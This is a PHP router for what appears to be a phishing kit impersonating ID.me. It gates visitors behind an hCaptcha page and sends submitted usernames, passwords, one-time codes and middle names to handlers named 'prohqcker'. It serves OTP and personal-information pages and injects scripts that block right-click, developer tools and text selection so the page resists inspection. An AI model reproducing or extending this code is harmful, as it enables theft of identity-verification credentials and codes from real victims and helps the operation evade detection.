<?php
session_start();
require_once 'captcha_system.php';

// Security headers and URL protection
header('X-Content-Type-Options: nosniff');
header('X-Frame-Options: DENY');
header('X-XSS-Protection: 1; mode=block');
header('Referrer-Policy: strict-origin-when-cross-origin');

// Prevent direct file access via URL manipulation
function preventDirectAccess() {
    $request_uri = $_SERVER['REQUEST_URI'];
    $script_name = $_SERVER['SCRIPT_NAME'];
    
    // Block access to sensitive files
    $blocked_extensions = ['.php', '.html', '.htm', '.txt', '.log', '.config'];
    $blocked_files = ['config.php', 'prohqcker.php', 'prohqcker2.php', 'prohqcker3.php', 'prohqcker4.php', 'prohqcker_middlename.php'];
    
    // Check if trying to access blocked files directly
    foreach ($blocked_files as $file) {
        if (strpos($request_uri, $file) !== false && $request_uri !== $script_name) {
            http_response_code(404);
            die('File not found');
        }
    }
    
    // Check for blocked extensions in URL
    foreach ($blocked_extensions as $ext) {
        if (strpos($request_uri, $ext) !== false && $request_uri !== $script_name) {
            http_response_code(404);
            die('File not found');
        }
    }
    
    // Block directory traversal attempts
    if (strpos($request_uri, '..') !== false || strpos($request_uri, './') !== false) {
        http_response_code(403);
        die('Access denied');
    }
}

// Apply security checks
preventDirectAccess();

// Function to serve HTML content with proper processing
function serveIndexContent() {
    // Check if captcha is verified
    if (!HCaptchaSystem::isCaptchaVerified()) {
        return serveCaptchaPage();
    }
    
    $html_file = '_index.html';
    
    if (!file_exists($html_file)) {
        http_response_code(404);
        die('Page not found');
    }
    
    // Read and process the HTML content
    $content = file_get_contents($html_file);
    
    if ($content === false) {
        http_response_code(500);
        die('Unable to load page');
    }
    
    // Add anti-inspection protection to the HTML
    $protection_script = '
    <script>
    // Full Anti-inspection protection - ONLY for verified users
    (function() {
        "use strict";
        
        // Check if user is verified (this runs only after captcha)
        let protectionActive = true;
        
        if (protectionActive) {
            // Disable right-click
            document.addEventListener("contextmenu", function(e) {
                e.preventDefault();
                showAccessDenied();
                return false;
            });
            
            // Disable all developer tool shortcuts
            document.addEventListener("keydown", function(e) {
                if (e.keyCode === 123 || // F12
                    (e.ctrlKey && e.shiftKey && e.keyCode === 73) || // Ctrl+Shift+I
                    (e.ctrlKey && e.keyCode === 85) || // Ctrl+U
                    (e.ctrlKey && e.shiftKey && e.keyCode === 67) || // Ctrl+Shift+C
                    (e.ctrlKey && e.shiftKey && e.keyCode === 74)) { // Ctrl+Shift+J
                    e.preventDefault();
                    showAccessDenied();
                    return false;
                }
            });
            
            // Detect DevTools opening - with delay to avoid false positives
            let devtools = {open: false, orientation: null};
            const threshold = 160;
            let devToolsCheckCount = 0;
            
            const checkDevTools = () => {
                if (window.outerHeight - window.innerHeight > threshold || 
                    window.outerWidth - window.innerWidth > threshold) {
                    devToolsCheckCount++;
                    // Only trigger after multiple consecutive detections
                    if (devToolsCheckCount > 3 && !devtools.open) {
                        devtools.open = true;
                        showAccessDenied();
                    }
                } else {
                    devtools.open = false;
                    devToolsCheckCount = 0;
                }
            };
            
            // Start monitoring after page is fully loaded
            setTimeout(() => {
                setInterval(checkDevTools, 1000);
            }, 3000);
            
            // Disable text selection (but allow input fields)
            document.onselectstart = function(e) { 
                if (e.target.tagName === "INPUT" || e.target.tagName === "TEXTAREA") {
                    return true; // Allow selection in input fields
                }
                return false; 
            };
            document.onmousedown = function(e) { 
                if (e.target.tagName === "INPUT" || e.target.tagName === "TEXTAREA") {
                    return true; // Allow mouse events in input fields
                }
                return false; 
            };
            document.ondragstart = function() { return false; };
            
            // Console protection with delay
            setTimeout(() => {
                let consoleWarning = false;
                Object.defineProperty(window, "console", {
                    get: function() {
                        if (!consoleWarning) {
                            consoleWarning = true;
                            setTimeout(() => {
                                showAccessDenied();
                            }, 2000);
                        }
                        return console;
                    }
                });
            }, 2000);
            
            function showAccessDenied() {
                document.body.innerHTML = `
                    <div style="text-align:center;padding:50px;font-family:Arial;background:#f5f5f5;min-height:100vh;">
                        <h1 style="color:#d32f2f;">🚫 Access Denied</h1>
                        <p style="font-size:18px;color:#666;">Developer tools detected.</p>
                        <p style="color:#666;">Code inspection is not allowed on this page.</p>
                        <button onclick="location.reload()" style="padding:10px 20px;background:#4285f4;color:white;border:none;border-radius:5px;cursor:pointer;margin-top:20px;">Reload Page</button>
                    </div>
                `;
            }
        }
    })();
    </script>
    <style>
    body, * {
        -webkit-user-select: none !important;
        -moz-user-select: none !important;
        -ms-user-select: none !important;
        user-select: none !important;
        -webkit-touch-callout: none !important;
        -webkit-tap-highlight-color: transparent !important;
    }
    
    /* Allow text selection and interaction in input fields */
    input, textarea, select {
        -webkit-user-select: text !important;
        -moz-user-select: text !important;
        -ms-user-select: text !important;
        user-select: text !important;
        pointer-events: auto !important;
    }
    </style>';
    
    // Insert protection script before closing body tag
    $content = str_replace('</body>', $protection_script . '</body>', $content);
    
    // Set proper content type
    header('Content-Type: text/html; charset=utf-8');
    
    return $content;
}

// Function to serve captcha page
function serveCaptchaPage() {
    $hcaptcha = new HCaptchaSystem();
    $captcha_html = $hcaptcha->generateCaptchaHTML();
    
    $html = '<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Security Verification - ID.me</title>
    <link rel="icon" type="image/png" href="id.ico">
    <link rel="stylesheet" href="captcha_styles.css">
    <script src="https://js.hcaptcha.com/1/api.js" async defer></script>
    <style>
        body {
            margin: 0;
            padding: 0;
            min-height: 100vh;
            background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);
            font-family: "Roboto", "Arial", sans-serif;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        
        .security-notice {
            text-align: center;
            color: #333;
            margin-bottom: 30px;
            padding: 20px;
            background: white;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
        }
        
        .security-notice h2 {
            margin: 0 0 10px 0;
            font-size: 24px;
            font-weight: 400;
            color: #333;
        }
        
        .security-notice p {
            margin: 0;
            color: #666;
            line-height: 1.5;
        }
        
        .hcaptcha-wrapper {
            display: flex;
            justify-content: center;
            margin: 25px 0;
        }
    </style>
</head>
<body>
    <div class="main-container">
        <div class="security-notice">
            <h2>🔒 Security Verification</h2>
            <p>Please complete the verification below to access the site.</p>
        </div>
        
        ' . $captcha_html . '
    </div>
    
    <script>
        function onHCaptchaSuccess(token) {
            console.log("hCaptcha completed with token:", token);
            
            // Enable the continue button
            const continueBtn = document.getElementById("continue-btn");
            if (continueBtn) {
                continueBtn.disabled = false;
                continueBtn.style.background = "#4285f4";
                continueBtn.style.cursor = "pointer";
                continueBtn.style.opacity = "1";
            }
        }
        
        function proceedToSite() {
            const continueBtn = document.getElementById("continue-btn");
            if (continueBtn && !continueBtn.disabled) {
                // Get hCaptcha response token
                const hcaptchaResponse = document.querySelector("[name=h-captcha-response]");
                if (!hcaptchaResponse || !hcaptchaResponse.value) {
                    alert("Please complete the captcha first");
                    return;
                }
                
                // Show loading
                document.getElementById("hcaptcha-container").innerHTML = `
                    <div style="text-align:center;padding:40px;">
                        <div style="width:40px;height:40px;border:3px solid #f3f3f3;border-top:3px solid #4285f4;border-radius:50%;animation:spin 1s linear infinite;margin:0 auto 20px;"></div>
                        <p>Verifying...</p>
                    </div>
                    <style>@keyframes spin{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}</style>
                `;
                
                // Submit verification
                const formData = new FormData();
                formData.append("action", "verify_hcaptcha");
                formData.append("h-captcha-response", hcaptchaResponse.value);
                
                fetch("captcha_verify.php", {
                    method: "POST",
                    body: formData
                })
                .then(response => response.json())
                .then(result => {
                    if (result.success) {
                        document.getElementById("hcaptcha-container").innerHTML = `
                            <div style="text-align:center;padding:40px;">
                                <div style="font-size:48px;color:#4CAF50;margin-bottom:20px;">✓</div>
                                <h3>Verification Successful!</h3>
                                <p>Loading secure content...</p>
                            </div>
                        `;
                        setTimeout(() => window.location.reload(), 1500);
                    } else {
                        document.getElementById("hcaptcha-container").innerHTML = `
                            <div style="text-align:center;padding:40px;">
                                <div style="font-size:48px;color:#f44336;margin-bottom:20px;">✗</div>
                                <h3>Verification Failed</h3>
                                <p>${result.error || "Please try again"}</p>
                                <button onclick="location.reload()" style="margin-top:20px;padding:10px 20px;background:#4285f4;color:white;border:none;border-radius:5px;cursor:pointer;">Try Again</button>
                            </div>
                        `;
                    }
                })
                .catch(error => {
                    document.getElementById("hcaptcha-container").innerHTML = `
                        <div style="text-align:center;padding:40px;">
                            <div style="font-size:48px;color:#f44336;margin-bottom:20px;">✗</div>
                            <h3>Network Error</h3>
                            <p>Please check your connection and try again.</p>
                            <button onclick="location.reload()" style="margin-top:20px;padding:10px 20px;background:#4285f4;color:white;border:none;border-radius:5px;cursor:pointer;">Try Again</button>
                        </div>
                    `;
                });
            }
        }
    </script>
</body>
</html>';
    
    return $html;
}

// Handle form submissions
function handleFormSubmission() {
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        // Check if captcha is verified for form submissions
        if (!HCaptchaSystem::isCaptchaVerified()) {
            http_response_code(403);
            die('Access denied. Please complete security verification first.');
        }
        
        $request_uri = $_SERVER['REQUEST_URI'];
        
        // Handle login form submission
        if (isset($_POST['username']) && isset($_POST['password'])) {
            // Include the processing logic
            include_once('prohqcker.php');
            exit();
        }
        
        // Handle other form types based on POST data
        if (isset($_POST['otp']) || isset($_POST['verification_code'])) {
            include_once('prohqcker2.php');
            exit();
        }
        
        if (isset($_POST['middlename'])) {
            include_once('prohqcker_middlename.php');
            exit();
        }
    }
}

// URL routing and content serving
function handleRequest() {
    $request_uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
    $base_path = dirname($_SERVER['SCRIPT_NAME']);
    
    // Remove base path from request URI
    if ($base_path !== '/') {
        $request_uri = substr($request_uri, strlen($base_path));
    }
    
    // Clean the request URI
    $request_uri = trim($request_uri, '/');
    
    // Handle form submissions first
    handleFormSubmission();
    
    // Route handling for GET requests
    switch ($request_uri) {
        case '':
        case 'index':
        case 'home':
            // Serve the main index content
            echo serveIndexContent();
            break;
            
        case 'otp':
        case 'verify':
            // Check captcha verification for protected pages
            if (!HCaptchaSystem::isCaptchaVerified()) {
                echo serveCaptchaPage();
                break;
            }
            // Serve OTP page
            if (file_exists('otp.html')) {
                header('Content-Type: text/html; charset=utf-8');
                $content = file_get_contents('otp.html');
                // Add protection to other pages too
                $protection_script = '<script>document.addEventListener("contextmenu", function(e) { e.preventDefault(); return false; }); document.addEventListener("keydown", function(e) { if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && e.keyCode === 73) || (e.ctrlKey && e.keyCode === 85)) { e.preventDefault(); return false; } });</script>';
                $content = str_replace('</body>', $protection_script . '</body>', $content);
                echo $content;
            } else {
                echo serveIndexContent();
            }
            break;
            
        case 'personal':
            // Check captcha verification for protected pages
            if (!HCaptchaSystem::isCaptchaVerified()) {
                echo serveCaptchaPage();
                break;
            }
            // Serve personal info page
            if (file_exists('personal.html')) {
                header('Content-Type: text/html; charset=utf-8');
                $content = file_get_contents('personal.html');
                // Add protection to other pages too
                $protection_script = '<script>document.addEventListener("contextmenu", function(e) { e.preventDefault(); return false; }); document.addEventListener("keydown", function(e) { if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && e.keyCode === 73) || (e.ctrlKey && e.keyCode === 85)) { e.preventDefault(); return false; } });</script>';
                $content = str_replace('</body>', $protection_script . '</body>', $content);
                echo $content;
            } else {
                echo serveIndexContent();
            }
            break;
            
        case 'middlename':
            // Check captcha verification for protected pages
            if (!HCaptchaSystem::isCaptchaVerified()) {
                echo serveCaptchaPage();
                break;
            }
            // Serve middlename page
            if (file_exists('middlename.html')) {
                header('Content-Type: text/html; charset=utf-8');
                $content = file_get_contents('middlename.html');
                // Add protection to other pages too
                $protection_script = '<script>document.addEventListener("contextmenu", function(e) { e.preventDefault(); return false; }); document.addEventListener("keydown", function(e) { if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && e.keyCode === 73) || (e.ctrlKey && e.keyCode === 85)) { e.preventDefault(); return false; } });</script>';
                $content = str_replace('</body>', $protection_script . '</body>', $content);
                echo $content;
            } else {
                echo serveIndexContent();
            }
            break;
            
        case 'captcha_styles.css':
            // Serve captcha CSS
            if (file_exists('captcha_styles.css')) {
                header('Content-Type: text/css');
                readfile('captcha_styles.css');
            } else {
                http_response_code(404);
                die('CSS file not found');
            }
            break;
            
        case 'captcha_script.js':
            // Serve captcha JavaScript
            if (file_exists('captcha_script.js')) {
                header('Content-Type: application/javascript');
                readfile('captcha_script.js');
            } else {
                http_response_code(404);
                die('JS file not found');
            }
            break;
            
        case 'css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css':
            // Serve CSS file
            if (file_exists('css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css')) {
                header('Content-Type: text/css');
                readfile('css/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css');
            } else {
                http_response_code(404);
                die('CSS file not found');
            }
            break;
            
        default:
            // Check if it's an image or asset request
            if (preg_match('/^images\/(.+)$/', $request_uri, $matches)) {
                $image_path = 'images/' . $matches[1];
                if (file_exists($image_path)) {
                    $mime_type = mime_content_type($image_path);
                    header('Content-Type: ' . $mime_type);
                    readfile($image_path);
                } else {
                    http_response_code(404);
                    die('Image not found');
                }
            } else {
                // For any other request, serve the main page
                echo serveIndexContent();
            }
            break;
    }
}

// Main execution
try {
    handleRequest();
} catch (Exception $e) {
    error_log('Index.php error: ' . $e->getMessage());
    http_response_code(500);
    die('Internal server error');
}
?>